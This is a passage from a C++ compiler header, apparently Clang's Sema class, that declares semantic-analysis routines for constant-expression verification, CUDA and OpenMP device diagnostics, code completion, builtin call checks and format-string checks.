void DiagnoseAssignmentAsCondition(Expr *E);
/// Redundant parentheses over an equality comparison can indicate
/// that the user intended an assignment used as condition.
void DiagnoseEqualityWithExtraParens(ParenExpr *ParenE);
/// CheckCXXBooleanCondition - Returns true if conversion to bool is invalid.
ExprResult CheckCXXBooleanCondition(Expr *CondExpr, bool IsConstexpr = false);
/// ConvertIntegerToTypeWarnOnOverflow - Convert the specified APInt to have
/// the specified width and sign. If an overflow occurs, detect it and emit
/// the specified diagnostic.
void ConvertIntegerToTypeWarnOnOverflow(llvm::APSInt &OldVal,
unsigned NewWidth, bool NewSign,
SourceLocation Loc, unsigned DiagID);
/// Checks that the Objective-C declaration is declared in the global scope.
/// Emits an error and marks the declaration as invalid if it's not declared
/// in the global scope.
bool CheckObjCDeclScope(Decl *D);
/// Abstract base class used for diagnosing integer constant
/// expression violations.
class VerifyICEDiagnoser {
public:
bool Suppress;
VerifyICEDiagnoser(bool Suppress = false) : Suppress(Suppress) { }
virtual void diagnoseNotICE(Sema &S, SourceLocation Loc, SourceRange SR) =0;
virtual void diagnoseFold(Sema &S, SourceLocation Loc, SourceRange SR);
virtual ~VerifyICEDiagnoser() { }
};
/// VerifyIntegerConstantExpression - Verifies that an expression is an ICE,
/// and reports the appropriate diagnostics. Returns ExprError() on failure.
/// Can optionally return the value of the expression.
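///
/// Example usage (a sketch; E is an assumed call-site expression):
///
///   llvm::APSInt Value;
///   if (VerifyIntegerConstantExpression(E, &Value).isInvalid())
///     return ExprError();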
ExprResult VerifyIntegerConstantExpression(Expr *E, llvm::APSInt *Result,
VerifyICEDiagnoser &Diagnoser,
bool AllowFold = true);
ExprResult VerifyIntegerConstantExpression(Expr *E, llvm::APSInt *Result,
unsigned DiagID,
bool AllowFold = true);
ExprResult VerifyIntegerConstantExpression(Expr *E,
llvm::APSInt *Result = nullptr);
/// VerifyBitField - verifies that a bit-field expression is an ICE and has
/// the correct width, and that the field type is valid.
/// Returns ExprError() on failure.
/// Can optionally report whether the bit-field is of width 0.
ExprResult VerifyBitField(SourceLocation FieldLoc, IdentifierInfo *FieldName,
QualType FieldTy, bool IsMsStruct,
Expr *BitWidth, bool *ZeroWidth = nullptr);
private:
unsigned ForceCUDAHostDeviceDepth = 0;
public:
/// Increments our count of the number of times we've seen a pragma forcing
/// functions to be __host__ __device__. So long as this count is greater
/// than zero, all functions encountered will be __host__ __device__.
void PushForceCUDAHostDevice();
/// Decrements our count of the number of times we've seen a pragma forcing
/// functions to be __host__ __device__. Returns false if the count is 0
/// before decrementing, so you can emit an error.
bool PopForceCUDAHostDevice();
/// Diagnostics that are emitted only if we discover that the given function
/// must be codegen'ed. Because handling these correctly adds overhead to
/// compilation, this is currently only enabled for CUDA compilations.
llvm::DenseMap<CanonicalDeclPtr<FunctionDecl>,
std::vector<PartialDiagnosticAt>>
DeviceDeferredDiags;
/// A pair of a canonical FunctionDecl and a SourceLocation. When used as the
/// key in a hashtable, both the FD and location are hashed.
struct FunctionDeclAndLoc {
CanonicalDeclPtr<FunctionDecl> FD;
SourceLocation Loc;
};
/// FunctionDecls and SourceLocations for which CheckCUDACall has emitted a
/// (maybe deferred) "bad call" diagnostic. We use this to avoid emitting the
/// same deferred diag twice.
llvm::DenseSet<FunctionDeclAndLoc> LocsWithCUDACallDiags;
/// An inverse call graph, mapping known-emitted functions to one of their
/// known-emitted callers (plus the location of the call).
///
/// Functions that we can tell a priori must be emitted aren't added to this
/// map.
llvm::DenseMap</* Callee = */ CanonicalDeclPtr<FunctionDecl>,
/* Caller = */ FunctionDeclAndLoc>
DeviceKnownEmittedFns;
/// Diagnostic builder for CUDA/OpenMP device errors which may or may not be
/// deferred.
///
/// In CUDA, there exist constructs (e.g. variable-length arrays, try/catch)
/// which are not allowed to appear inside __device__ functions and are
/// allowed to appear in __host__ __device__ functions only if the host+device
/// function is never codegen'ed.
///
/// To handle this, we use the notion of "deferred diagnostics", where we
/// attach a diagnostic to a FunctionDecl that's emitted iff it's codegen'ed.
///
/// This class lets you emit either a regular diagnostic, a deferred
/// diagnostic, or no diagnostic at all, according to an argument you pass to
/// its constructor, thus simplifying the process of creating these "maybe
/// deferred" diagnostics.
class DeviceDiagBuilder {
public:
enum Kind {
/// Emit no diagnostics.
K_Nop,
/// Emit the diagnostic immediately (i.e., behave like Sema::Diag()).
K_Immediate,
/// Emit the diagnostic immediately, and, if it's a warning or error, also
/// emit a call stack showing how this function can be reached by an a
/// priori known-emitted function.
K_ImmediateWithCallStack,
/// Create a deferred diagnostic, which is emitted only if the function
/// it's attached to is codegen'ed. Also emit a call stack as with
/// K_ImmediateWithCallStack.
K_Deferred
};
DeviceDiagBuilder(Kind K, SourceLocation Loc, unsigned DiagID,
FunctionDecl *Fn, Sema &S);
DeviceDiagBuilder(DeviceDiagBuilder &&D);
DeviceDiagBuilder(const DeviceDiagBuilder &) = default;
~DeviceDiagBuilder();
/// Convertible to bool: True if we immediately emitted an error, false if
/// we didn't emit an error or we created a deferred error.
///
/// Example usage:
///
/// if (DeviceDiagBuilder(...) << foo << bar)
/// return ExprError();
///
/// But see CUDADiagIfDeviceCode() and CUDADiagIfHostCode() -- you probably
/// want to use these instead of creating a DeviceDiagBuilder yourself.
operator bool() const { return ImmediateDiag.hasValue(); }
template <typename T>
friend const DeviceDiagBuilder &operator<<(const DeviceDiagBuilder &Diag,
const T &Value) {
if (Diag.ImmediateDiag.hasValue())
*Diag.ImmediateDiag << Value;
else if (Diag.PartialDiagId.hasValue())
Diag.S.DeviceDeferredDiags[Diag.Fn][*Diag.PartialDiagId].second
<< Value;
return Diag;
}
private:
Sema &S;
SourceLocation Loc;
unsigned DiagID;
FunctionDecl *Fn;
bool ShowCallStack;
// Invariant: At most one of these Optionals has a value.
// FIXME: Switch these to a Variant once that exists.
llvm::Optional<SemaDiagnosticBuilder> ImmediateDiag;
llvm::Optional<unsigned> PartialDiagId;
};
/// Creates a DeviceDiagBuilder that emits the diagnostic if the current context
/// is "used as device code".
///
/// - If CurContext is a __host__ function, does not emit any diagnostics.
/// - If CurContext is a __device__ or __global__ function, emits the
/// diagnostics immediately.
/// - If CurContext is a __host__ __device__ function and we are compiling for
/// the device, creates a diagnostic which is emitted if and when we realize
/// that the function will be codegen'ed.
///
/// Example usage:
///
/// // Variable-length arrays are not allowed in CUDA device code.
/// if (CUDADiagIfDeviceCode(Loc, diag::err_cuda_vla) << CurrentCUDATarget())
/// return ExprError();
/// // Otherwise, continue parsing as normal.
DeviceDiagBuilder CUDADiagIfDeviceCode(SourceLocation Loc, unsigned DiagID);
/// Creates a DeviceDiagBuilder that emits the diagnostic if the current context
/// is "used as host code".
///
/// Same as CUDADiagIfDeviceCode, with "host" and "device" switched.
DeviceDiagBuilder CUDADiagIfHostCode(SourceLocation Loc, unsigned DiagID);
/// Creates a DeviceDiagBuilder that emits the diagnostic if the current
/// context is "used as device code".
///
/// - If CurContext is a `declare target` function or it is known that the
/// function is emitted for the device, emits the diagnostics immediately.
/// - If CurContext is a non-`declare target` function and we are compiling
/// for the device, creates a diagnostic which is emitted if and when we
/// realize that the function will be codegen'ed.
///
/// Example usage:
///
/// // Variable-length arrays are not allowed in NVPTX device code.
/// if (diagIfOpenMPDeviceCode(Loc, diag::err_vla_unsupported))
/// return ExprError();
/// // Otherwise, continue parsing as normal.
DeviceDiagBuilder diagIfOpenMPDeviceCode(SourceLocation Loc, unsigned DiagID);
/// Creates a DeviceDiagBuilder that emits the diagnostic if the current
/// context is "used as host code".
///
/// - If CurContext is a `declare target` function or it is known that the
/// function is emitted for the host, emits the diagnostics immediately.
/// - If CurContext is a non-host function, just ignore it.
///
/// Example usage:
///
/// // Variable-length arrays are not allowed in NVPTX device code.
/// if (diagIfOpenMPHostCode(Loc, diag::err_vla_unsupported))
/// return ExprError();
/// // Otherwise, continue parsing as normal.
DeviceDiagBuilder diagIfOpenMPHostCode(SourceLocation Loc, unsigned DiagID);
DeviceDiagBuilder targetDiag(SourceLocation Loc, unsigned DiagID);
enum CUDAFunctionTarget {
CFT_Device,
CFT_Global,
CFT_Host,
CFT_HostDevice,
CFT_InvalidTarget
};
/// Determines whether the given function is a CUDA device/host/kernel/etc.
/// function.
///
/// Use this rather than examining the function's attributes yourself -- you
/// will get it wrong. Returns CFT_Host if D is null.
CUDAFunctionTarget IdentifyCUDATarget(const FunctionDecl *D,
bool IgnoreImplicitHDAttr = false);
CUDAFunctionTarget IdentifyCUDATarget(const ParsedAttributesView &Attrs);
/// Gets the CUDA target for the current context.
CUDAFunctionTarget CurrentCUDATarget() {
return IdentifyCUDATarget(dyn_cast<FunctionDecl>(CurContext));
}
// CUDA function call preference. Must be ordered numerically from
// worst to best.
enum CUDAFunctionPreference {
CFP_Never, // Invalid caller/callee combination.
CFP_WrongSide, // Calls from host-device to host or device
// function that do not match current compilation
// mode.
CFP_HostDevice, // Any calls to host/device functions.
CFP_SameSide, // Calls from host-device to host or device
// function matching current compilation mode.
CFP_Native, // host-to-host or device-to-device calls.
};
/// Identifies relative preference of a given Caller/Callee
/// combination, based on their host/device attributes.
/// \param Caller The function which needs the address of \p Callee;
/// nullptr in case of global context.
/// \param Callee target function
///
/// \returns preference value for particular Caller/Callee combination.
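///
/// Example usage (a sketch; Caller, FnA, and FnB are assumed call-site
/// values):
///
///   if (IdentifyCUDAPreference(Caller, FnA) >
///       IdentifyCUDAPreference(Caller, FnB))
///     ; // FnA is the better candidate for this Caller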
CUDAFunctionPreference IdentifyCUDAPreference(const FunctionDecl *Caller,
const FunctionDecl *Callee);
/// Determines whether Caller may invoke Callee, based on their CUDA
/// host/device attributes. Returns false if the call is not allowed.
///
/// Note: Will return true for CFP_WrongSide calls. These may appear in
/// semantically correct CUDA programs, but only if they're never codegen'ed.
bool IsAllowedCUDACall(const FunctionDecl *Caller,
const FunctionDecl *Callee) {
return IdentifyCUDAPreference(Caller, Callee) != CFP_Never;
}
/// May add implicit CUDAHostAttr and CUDADeviceAttr attributes to FD,
/// depending on FD and the current compilation settings.
void maybeAddCUDAHostDeviceAttrs(FunctionDecl *FD,
const LookupResult &Previous);
public:
/// Check whether we're allowed to call Callee from the current context.
///
/// - If the call is never allowed in a semantically-correct program
/// (CFP_Never), emits an error and returns false.
///
/// - If the call is allowed in semantically-correct programs, but only if
/// it's never codegen'ed (CFP_WrongSide), creates a deferred diagnostic to
/// be emitted if and when the caller is codegen'ed, and returns true.
///
/// Will only create deferred diagnostics for a given SourceLocation once,
/// so you can safely call this multiple times without generating duplicate
/// deferred errors.
///
/// - Otherwise, returns true without emitting any diagnostics.
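///
/// Example usage (a sketch; Loc and Callee are assumed call-site values):
///
///   if (!CheckCUDACall(Loc, Callee))
///     return ExprError();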
bool CheckCUDACall(SourceLocation Loc, FunctionDecl *Callee);
/// Set __device__ or __host__ __device__ attributes on the given lambda
/// operator() method.
///
/// CUDA lambdas declared inside __device__ or __global__ functions inherit
/// the __device__ attribute. Similarly, lambdas inside __host__ __device__
/// functions become __host__ __device__ themselves.
void CUDASetLambdaAttrs(CXXMethodDecl *Method);
/// Finds a function in \p Matches with highest calling priority
/// from \p Caller context and erases all functions with lower
/// calling priority.
void EraseUnwantedCUDAMatches(
const FunctionDecl *Caller,
SmallVectorImpl<std::pair<DeclAccessPair, FunctionDecl *>> &Matches);
/// Given an implicit special member, infer its CUDA target from the
/// calls it needs to make to underlying base/field special members.
/// \param ClassDecl the class for which the member is being created.
/// \param CSM the kind of special member.
/// \param MemberDecl the special member itself.
/// \param ConstRHS true if this is a copy operation with a const object on
/// its RHS.
/// \param Diagnose true if this call should emit diagnostics.
/// \return true if there was an error inferring.
/// The result of this call is implicit CUDA target attribute(s) attached to
/// the member declaration.
bool inferCUDATargetForImplicitSpecialMember(CXXRecordDecl *ClassDecl,
CXXSpecialMember CSM,
CXXMethodDecl *MemberDecl,
bool ConstRHS,
bool Diagnose);
/// \return true if \p CD can be considered empty according to CUDA
/// (E.2.3.1 in CUDA 7.5 Programming guide).
bool isEmptyCudaConstructor(SourceLocation Loc, CXXConstructorDecl *CD);
bool isEmptyCudaDestructor(SourceLocation Loc, CXXDestructorDecl *CD);
// \brief Checks that initializers of \p Var satisfy CUDA restrictions. In
// case of error emits appropriate diagnostic and invalidates \p Var.
//
// \details CUDA allows only empty constructors as initializers for global
// variables (see E.2.3.1, CUDA 7.5). The same restriction also applies to all
// __shared__ variables whether they are local or not (they all are implicitly
// static in CUDA). One exception is that CUDA allows constant initializers
// for __constant__ and __device__ variables.
void checkAllowedCUDAInitializer(VarDecl *VD);
/// Check whether NewFD is a valid overload for CUDA. Emits
/// diagnostics and invalidates NewFD if not.
void checkCUDATargetOverload(FunctionDecl *NewFD,
const LookupResult &Previous);
/// Copies target attributes from the template TD to the function FD.
void inheritCUDATargetAttrs(FunctionDecl *FD, const FunctionTemplateDecl &TD);
/// Returns the name of the launch configuration function. This is the name
/// of the function that will be called to configure a kernel call, with the
/// parameters specified via <<<>>>.
std::string getCudaConfigureFuncName() const;
/// \name Code completion
//@{
/// Describes the context in which code completion occurs.
enum ParserCompletionContext {
/// Code completion occurs at top-level or namespace context.
PCC_Namespace,
/// Code completion occurs within a class, struct, or union.
PCC_Class,
/// Code completion occurs within an Objective-C interface, protocol,
/// or category.
PCC_ObjCInterface,
/// Code completion occurs within an Objective-C implementation or
/// category implementation
PCC_ObjCImplementation,
/// Code completion occurs within the list of instance variables
/// in an Objective-C interface, protocol, category, or implementation.
PCC_ObjCInstanceVariableList,
/// Code completion occurs following one or more template
/// headers.
PCC_Template,
/// Code completion occurs following one or more template
/// headers within a class.
PCC_MemberTemplate,
/// Code completion occurs within an expression.
PCC_Expression,
/// Code completion occurs within a statement, which may
/// also be an expression or a declaration.
PCC_Statement,
/// Code completion occurs at the beginning of the
/// initialization statement (or expression) in a for loop.
PCC_ForInit,
/// Code completion occurs within the condition of an if,
/// while, switch, or for statement.
PCC_Condition,
/// Code completion occurs within the body of a function on a
/// recovery path, where we do not have a specific handle on our position
/// in the grammar.
PCC_RecoveryInFunction,
/// Code completion occurs where only a type is permitted.
PCC_Type,
/// Code completion occurs in a parenthesized expression, which
/// might also be a type cast.
PCC_ParenthesizedExpression,
/// Code completion occurs within a sequence of declaration
/// specifiers within a function, method, or block.
PCC_LocalDeclarationSpecifiers
};
void CodeCompleteModuleImport(SourceLocation ImportLoc, ModuleIdPath Path);
void CodeCompleteOrdinaryName(Scope *S,
ParserCompletionContext CompletionContext);
void CodeCompleteDeclSpec(Scope *S, DeclSpec &DS,
bool AllowNonIdentifiers,
bool AllowNestedNameSpecifiers);
struct CodeCompleteExpressionData;
void CodeCompleteExpression(Scope *S,
const CodeCompleteExpressionData &Data);
void CodeCompleteExpression(Scope *S, QualType PreferredType,
bool IsParenthesized = false);
void CodeCompleteMemberReferenceExpr(Scope *S, Expr *Base, Expr *OtherOpBase,
SourceLocation OpLoc, bool IsArrow,
bool IsBaseExprStatement,
QualType PreferredType);
void CodeCompletePostfixExpression(Scope *S, ExprResult LHS,
QualType PreferredType);
void CodeCompleteTag(Scope *S, unsigned TagSpec);
void CodeCompleteTypeQualifiers(DeclSpec &DS);
void CodeCompleteFunctionQualifiers(DeclSpec &DS, Declarator &D,
const VirtSpecifiers *VS = nullptr);
void CodeCompleteBracketDeclarator(Scope *S);
void CodeCompleteCase(Scope *S);
/// Reports signatures for a call to CodeCompleteConsumer and returns the
/// preferred type for the current argument. Returned type can be null.
QualType ProduceCallSignatureHelp(Scope *S, Expr *Fn, ArrayRef<Expr *> Args,
SourceLocation OpenParLoc);
QualType ProduceConstructorSignatureHelp(Scope *S, QualType Type,
SourceLocation Loc,
ArrayRef<Expr *> Args,
SourceLocation OpenParLoc);
QualType ProduceCtorInitMemberSignatureHelp(Scope *S, Decl *ConstructorDecl,
CXXScopeSpec SS,
ParsedType TemplateTypeTy,
ArrayRef<Expr *> ArgExprs,
IdentifierInfo *II,
SourceLocation OpenParLoc);
void CodeCompleteInitializer(Scope *S, Decl *D);
/// Trigger code completion for a record of \p BaseType. \p InitExprs are
/// expressions in the initializer list seen so far and \p D is the current
/// Designation being parsed.
void CodeCompleteDesignator(const QualType BaseType,
llvm::ArrayRef<Expr *> InitExprs,
const Designation &D);
void CodeCompleteAfterIf(Scope *S);
void CodeCompleteQualifiedId(Scope *S, CXXScopeSpec &SS, bool EnteringContext,
bool IsUsingDeclaration, QualType BaseType,
QualType PreferredType);
void CodeCompleteUsing(Scope *S);
void CodeCompleteUsingDirective(Scope *S);
void CodeCompleteNamespaceDecl(Scope *S);
void CodeCompleteNamespaceAliasDecl(Scope *S);
void CodeCompleteOperatorName(Scope *S);
void CodeCompleteConstructorInitializer(
Decl *Constructor,
ArrayRef<CXXCtorInitializer *> Initializers);
void CodeCompleteLambdaIntroducer(Scope *S, LambdaIntroducer &Intro,
bool AfterAmpersand);
void CodeCompleteObjCAtDirective(Scope *S);
void CodeCompleteObjCAtVisibility(Scope *S);
void CodeCompleteObjCAtStatement(Scope *S);
void CodeCompleteObjCAtExpression(Scope *S);
void CodeCompleteObjCPropertyFlags(Scope *S, ObjCDeclSpec &ODS);
void CodeCompleteObjCPropertyGetter(Scope *S);
void CodeCompleteObjCPropertySetter(Scope *S);
void CodeCompleteObjCPassingType(Scope *S, ObjCDeclSpec &DS,
bool IsParameter);
void CodeCompleteObjCMessageReceiver(Scope *S);
void CodeCompleteObjCSuperMessage(Scope *S, SourceLocation SuperLoc,
ArrayRef<IdentifierInfo *> SelIdents,
bool AtArgumentExpression);
void CodeCompleteObjCClassMessage(Scope *S, ParsedType Receiver,
ArrayRef<IdentifierInfo *> SelIdents,
bool AtArgumentExpression,
bool IsSuper = false);
void CodeCompleteObjCInstanceMessage(Scope *S, Expr *Receiver,
ArrayRef<IdentifierInfo *> SelIdents,
bool AtArgumentExpression,
ObjCInterfaceDecl *Super = nullptr);
void CodeCompleteObjCForCollection(Scope *S,
DeclGroupPtrTy IterationVar);
void CodeCompleteObjCSelector(Scope *S,
ArrayRef<IdentifierInfo *> SelIdents);
void CodeCompleteObjCProtocolReferences(
ArrayRef<IdentifierLocPair> Protocols);
void CodeCompleteObjCProtocolDecl(Scope *S);
void CodeCompleteObjCInterfaceDecl(Scope *S);
void CodeCompleteObjCSuperclass(Scope *S,
IdentifierInfo *ClassName,
SourceLocation ClassNameLoc);
void CodeCompleteObjCImplementationDecl(Scope *S);
void CodeCompleteObjCInterfaceCategory(Scope *S,
IdentifierInfo *ClassName,
SourceLocation ClassNameLoc);
void CodeCompleteObjCImplementationCategory(Scope *S,
IdentifierInfo *ClassName,
SourceLocation ClassNameLoc);
void CodeCompleteObjCPropertyDefinition(Scope *S);
void CodeCompleteObjCPropertySynthesizeIvar(Scope *S,
IdentifierInfo *PropertyName);
void CodeCompleteObjCMethodDecl(Scope *S, Optional<bool> IsInstanceMethod,
ParsedType ReturnType);
void CodeCompleteObjCMethodDeclSelector(Scope *S,
bool IsInstanceMethod,
bool AtParameterName,
ParsedType ReturnType,
ArrayRef<IdentifierInfo *> SelIdents);
void CodeCompleteObjCClassPropertyRefExpr(Scope *S, IdentifierInfo &ClassName,
SourceLocation ClassNameLoc,
bool IsBaseExprStatement);
void CodeCompletePreprocessorDirective(bool InConditional);
void CodeCompleteInPreprocessorConditionalExclusion(Scope *S);
void CodeCompletePreprocessorMacroName(bool IsDefinition);
void CodeCompletePreprocessorExpression();
void CodeCompletePreprocessorMacroArgument(Scope *S,
IdentifierInfo *Macro,
MacroInfo *MacroInfo,
unsigned Argument);
void CodeCompleteIncludedFile(llvm::StringRef Dir, bool IsAngled);
void CodeCompleteNaturalLanguage();
void CodeCompleteAvailabilityPlatformName();
void GatherGlobalCodeCompletions(CodeCompletionAllocator &Allocator,
CodeCompletionTUInfo &CCTUInfo,
SmallVectorImpl<CodeCompletionResult> &Results);
//@}
//===--------------------------------------------------------------------===//
// Extra semantic analysis beyond the C type system
public:
SourceLocation getLocationOfStringLiteralByte(const StringLiteral *SL,
unsigned ByteNo) const;
private:
void CheckArrayAccess(const Expr *BaseExpr, const Expr *IndexExpr,
const ArraySubscriptExpr *ASE=nullptr,
bool AllowOnePastEnd=true, bool IndexNegated=false);
void CheckArrayAccess(const Expr *E);
// Used to grab the relevant information from a FormatAttr and a
// FunctionDeclaration.
struct FormatStringInfo {
unsigned FormatIdx;
unsigned FirstDataArg;
bool HasVAListArg;
};
static bool getFormatStringInfo(const FormatAttr *Format, bool IsCXXMember,
FormatStringInfo *FSI);
bool CheckFunctionCall(FunctionDecl *FDecl, CallExpr *TheCall,
const FunctionProtoType *Proto);
bool CheckObjCMethodCall(ObjCMethodDecl *Method, SourceLocation loc,
ArrayRef<const Expr *> Args);
bool CheckPointerCall(NamedDecl *NDecl, CallExpr *TheCall,
const FunctionProtoType *Proto);
bool CheckOtherCall(CallExpr *TheCall, const FunctionProtoType *Proto);
void CheckConstructorCall(FunctionDecl *FDecl,
ArrayRef<const Expr *> Args,
const FunctionProtoType *Proto,
SourceLocation Loc);
void checkCall(NamedDecl *FDecl, const FunctionProtoType *Proto,
const Expr *ThisArg, ArrayRef<const Expr *> Args,
bool IsMemberFunction, SourceLocation Loc, SourceRange Range,
VariadicCallType CallType);
bool CheckObjCString(Expr *Arg);
ExprResult CheckOSLogFormatStringArg(Expr *Arg);
ExprResult CheckBuiltinFunctionCall(FunctionDecl *FDecl,
unsigned BuiltinID, CallExpr *TheCall);
void checkFortifiedBuiltinMemoryFunction(FunctionDecl *FD, CallExpr *TheCall);
bool CheckARMBuiltinExclusiveCall(unsigned BuiltinID, CallExpr *TheCall,
unsigned MaxWidth);
bool CheckNeonBuiltinFunctionCall(unsigned BuiltinID, CallExpr *TheCall);
bool CheckMVEBuiltinFunctionCall(unsigned BuiltinID, CallExpr *TheCall);
bool CheckSVEBuiltinFunctionCall(unsigned BuiltinID, CallExpr *TheCall);
bool CheckCDEBuiltinFunctionCall(unsigned BuiltinID, CallExpr *TheCall);
bool CheckARMCoprocessorImmediate(const Expr *CoprocArg, bool WantCDE);
bool CheckARMBuiltinFunctionCall(unsigned BuiltinID, CallExpr *TheCall);
bool CheckAArch64BuiltinFunctionCall(unsigned BuiltinID, CallExpr *TheCall);
bool CheckBPFBuiltinFunctionCall(unsigned BuiltinID, CallExpr *TheCall);
bool CheckHexagonBuiltinFunctionCall(unsigned BuiltinID, CallExpr *TheCall);
bool CheckHexagonBuiltinArgument(unsigned BuiltinID, CallExpr *TheCall);
bool CheckMipsBuiltinFunctionCall(unsigned BuiltinID, CallExpr *TheCall);
bool CheckMipsBuiltinCpu(unsigned BuiltinID, CallExpr *TheCall);
bool CheckMipsBuiltinArgument(unsigned BuiltinID, CallExpr *TheCall);
bool CheckSystemZBuiltinFunctionCall(unsigned BuiltinID, CallExpr *TheCall);
bool CheckX86BuiltinRoundingOrSAE(unsigned BuiltinID, CallExpr *TheCall);
bool CheckX86BuiltinGatherScatterScale(unsigned BuiltinID, CallExpr *TheCall);
bool CheckX86BuiltinFunctionCall(unsigned BuiltinID, CallExpr *TheCall);
bool CheckPPCBuiltinFunctionCall(unsigned BuiltinID, CallExpr *TheCall);
bool SemaBuiltinVAStart(unsigned BuiltinID, CallExpr *TheCall);
bool SemaBuiltinVAStartARMMicrosoft(CallExpr *Call);
bool SemaBuiltinUnorderedCompare(CallExpr *TheCall);
bool SemaBuiltinFPClassification(CallExpr *TheCall, unsigned NumArgs);
bool SemaBuiltinVSX(CallExpr *TheCall);
bool SemaBuiltinOSLogFormat(CallExpr *TheCall);
public:
// Used by C++ template instantiation.
ExprResult SemaBuiltinShuffleVector(CallExpr *TheCall);
ExprResult SemaConvertVectorExpr(Expr *E, TypeSourceInfo *TInfo,
SourceLocation BuiltinLoc,
SourceLocation RParenLoc);
private:
bool SemaBuiltinPrefetch(CallExpr *TheCall);
bool SemaBuiltinAllocaWithAlign(CallExpr *TheCall);
bool SemaBuiltinAssume(CallExpr *TheCall);
bool SemaBuiltinAssumeAligned(CallExpr *TheCall);
bool SemaBuiltinLongjmp(CallExpr *TheCall);
bool SemaBuiltinSetjmp(CallExpr *TheCall);
ExprResult SemaBuiltinAtomicOverloaded(ExprResult TheCallResult);
ExprResult SemaBuiltinNontemporalOverloaded(ExprResult TheCallResult);
ExprResult SemaAtomicOpsOverloaded(ExprResult TheCallResult,
AtomicExpr::AtomicOp Op);
ExprResult SemaBuiltinOperatorNewDeleteOverloaded(ExprResult TheCallResult,
bool IsDelete);
bool SemaBuiltinConstantArg(CallExpr *TheCall, int ArgNum,
llvm::APSInt &Result);
bool SemaBuiltinConstantArgRange(CallExpr *TheCall, int ArgNum, int Low,
int High, bool RangeIsError = true);
bool SemaBuiltinConstantArgMultiple(CallExpr *TheCall, int ArgNum,
unsigned Multiple);
bool SemaBuiltinConstantArgPower2(CallExpr *TheCall, int ArgNum);
bool SemaBuiltinConstantArgShiftedByte(CallExpr *TheCall, int ArgNum,
unsigned ArgBits);
bool SemaBuiltinConstantArgShiftedByteOrXXFF(CallExpr *TheCall, int ArgNum,
unsigned ArgBits);
bool SemaBuiltinARMSpecialReg(unsigned BuiltinID, CallExpr *TheCall,
int ArgNum, unsigned ExpectedFieldNum,
bool AllowName);
bool SemaBuiltinARMMemoryTaggingCall(unsigned BuiltinID, CallExpr *TheCall);
public:
enum FormatStringType {
FST_Scanf,
FST_Printf,
FST_NSString,
FST_Strftime,
FST_Strfmon,
FST_Kprintf,
FST_FreeBSDKPrintf,
FST_OSTrace,
FST_OSLog,
FST_Unknown
};
static FormatStringType GetFormatStringType(const FormatAttr *Format);
bool FormatStringHasSArg(const StringLiteral *FExpr);
static bool GetFormatNSStringIdx(const FormatAttr *Format, unsigned &Idx);
private:
bool CheckFormatArguments(const FormatAttr *Format,
ArrayRef<const Expr *> Args,
bool IsCXXMember,
VariadicCallType CallType,
SourceLocation Loc, SourceRange Range,
llvm::SmallBitVector &CheckedVarArgs);
bool CheckFormatArguments(ArrayRef<const Expr *> Args,
bool HasVAListArg, unsigned format_idx,
unsigned firstDataArg, FormatStringType Type,
VariadicCallType CallType,
SourceLocation Loc, SourceRange range,
llvm::SmallBitVector &CheckedVarArgs);
void CheckAbsoluteValueFunction(const CallExpr *Call,
const FunctionDecl *FDecl);
void CheckMaxUnsignedZero(const CallExpr *Call, const FunctionDecl *FDecl);
void CheckMemaccessArguments(const CallExpr *Call,
unsigned BId,
IdentifierInfo *FnName);
void CheckStrlcpycatArguments(const CallExpr *Call,
IdentifierInfo *FnName);
void CheckStrncatArguments(const CallExpr *Call,
IdentifierInfo *FnName);
void CheckReturnValExpr(Expr *RetValExp, QualType lhsType,
SourceLocation ReturnLoc,
bool isObjCMethod = false,
const AttrVec *Attrs = nullptr,
const FunctionDecl *FD = nullptr);
public:
void CheckFloatComparison(SourceLocation Loc, Expr *LHS, Expr *RHS);
private:
void CheckImplicitConversions(Expr *E, SourceLocation CC = SourceLocation());
void CheckBoolLikeConversion(Expr *E, SourceLocation CC);
void CheckForIntOverflow(Expr *E);
void CheckUnsequencedOperations(const Expr *E);
/// Perform semantic checks on a completed expression. This will either
/// be a full-expression or a default argument expression.
void CheckCompletedExpr(Expr *E, SourceLocation CheckLoc = SourceLocation(),
bool IsConstexpr = false);
void CheckBitFieldInitialization(SourceLocation InitLoc, FieldDecl *Field,
Expr *Init);
/// Check if there is a field shadowing.
void CheckShadowInheritedFields(const SourceLocation &Loc,
DeclarationName FieldName,
const CXXRecordDecl *RD,
bool DeclIsField = true);
/// Check if the given expression contains a 'break' or 'continue'
/// statement that produces control flow different from GCC's.
void CheckBreakContinueBinding(Expr *E);
/// Check whether the receiver is a mutable ObjC container which
/// attempts to add itself into the container.
void CheckObjCCircularContainer(ObjCMessageExpr *Message);
void AnalyzeDeleteExprMismatch(const CXXDeleteExpr *DE);
void AnalyzeDeleteExprMismatch(FieldDecl *Field, SourceLocation DeleteLoc,
bool DeleteWasArrayForm);
public:
/// Register a magic integral constant to be used as a type tag.
void RegisterTypeTagForDatatype(const IdentifierInfo *ArgumentKind,
uint64_t MagicValue, QualType Type,
bool LayoutCompatible, bool MustBeNull);
struct TypeTagData {
TypeTagData() {}
TypeTagData(QualType Type, bool LayoutCompatible, bool MustBeNull) :
Type(Type), LayoutCompatible(LayoutCompatible),
MustBeNull(MustBeNull)
{}
QualType Type;
/// If true, \c Type should be compared with other expression's types for
/// layout-compatibility.
unsigned LayoutCompatible : 1;
unsigned MustBeNull : 1;
};
/// A pair of ArgumentKind identifier and magic value. This uniquely
/// identifies the magic value.
typedef std::pair<const IdentifierInfo *, uint64_t> TypeTagMagicValue;
private:
/// A map from magic value to type information.
std::unique_ptr<llvm::DenseMap<TypeTagMagicValue, TypeTagData>>
TypeTagForDatatypeMagicValues;
/// Perform checks on a call of a function with argument_with_type_tag
/// or pointer_with_type_tag attributes.
void CheckArgumentWithTypeTag(const ArgumentWithTypeTagAttr *Attr,
const ArrayRef<const Expr *> ExprArgs,
SourceLocation CallSiteLoc);
/// Check if we are taking the address of a packed field
/// as this may be a problem if the pointer value is dereferenced.
void CheckAddressOfPackedMember(Expr *rhs);
/// The parser's current scope.
///
/// The parser maintains this state here.
Scope *CurScope;
mutable IdentifierInfo *Ident_super;
mutable IdentifierInfo *Ident___float128;
/// Nullability type specifiers.
IdentifierInfo *Ident__Nonnull = nullptr;
IdentifierInfo *Ident__Nullable = nullptr;
IdentifierInfo *Ident__Null_unspecified = nullptr;
IdentifierInfo *Ident_NSError = nullptr;
/// The handler for the FileChanged preprocessor events.
///
/// Used for diagnostics that implement custom semantic analysis for #include
/// directives, like -Wpragma-pack.
sema::SemaPPCallbacks *SemaPPCallbackHandler;
protected:
friend class Parser;
friend class InitializationSequence;
friend class ASTReader;
friend class ASTDeclReader;
friend class ASTWriter;
public:
